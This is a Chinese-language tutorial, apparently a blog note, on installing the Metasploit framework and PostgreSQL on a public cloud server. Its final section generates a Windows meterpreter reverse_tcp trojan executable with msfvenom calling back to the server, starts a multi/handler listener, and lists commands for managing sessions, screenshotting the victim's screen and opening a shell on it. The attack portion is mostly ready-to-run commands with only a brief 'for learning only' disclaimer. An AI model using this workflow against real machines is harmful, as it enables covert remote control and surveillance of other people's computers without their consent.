公网云服务器快速搭建msf框架
0x00 安装MSF
使用Xshell等工具连上远程服务器后,首先确保服务器的网络是可以正常访问外网的
使用curl http://dyboy.cn 测试一下
网络没问题,接下来命令如下
// 切换目录
cd /home
// 获取MSF安装脚本
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
// 修改权限
chmod 755 msfinstall
// 开始安装
./msfinstall
等待一会儿就安装好了,服务器的入网带宽是非常高的,即服务器的下载速度很快
如果github无法正常下载,请添加host配置:
199.232.68.133 raw.githubusercontent.com
199.232.68.133 user-images.githubusercontent.com
199.232.68.133 avatars2.githubusercontent.com
199.232.68.133 avatars1.githubusercontent.com
(自行百度对于系统的host文件位置)i进去编辑,修改好以后先按esc再输入:wq回车 来保存.
0x01 安装postgresql
因为MSF需要记录一些数据,依赖于postgresql,因此还需要安装
同样在当前home目录下
// 获取安装
apt-get install postgresql
// 切换到postgres用户
su postgres
// 登录postgresql数据库,首次登录没有密码
psql
// 修改数据库用户postgres的密码
\password postgres
// 退出
\q
// 初始化
msfdb init
0X02 MSF初体验
(阿里云,腾讯云等需将自定义端口放行)
// 生成小马文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器IP LPORT=服务器监听端口 -f exe -o test.exe
// 进入msf
msfconsole
// 监听
use exploit/multi/handler
// 设置payload
set payload windows/meterpreter/reverse_tcp
// 设置
set LHOST 0.0.0.0
set LPORT 服务器监听端口
// 运行
run
// 将会话维持
background
// 罗列会话
sessions
// 进入会话
sesions 会话id
// 获取目标主机屏幕截图
screenshot
// 进入目标主机的Shell
shell
// 退出shell
exit
// 更多内容可以通过帮助查看
help
修改于作者:@M0rta1s
版权声明:作为笔记收集,仅供学习使用.
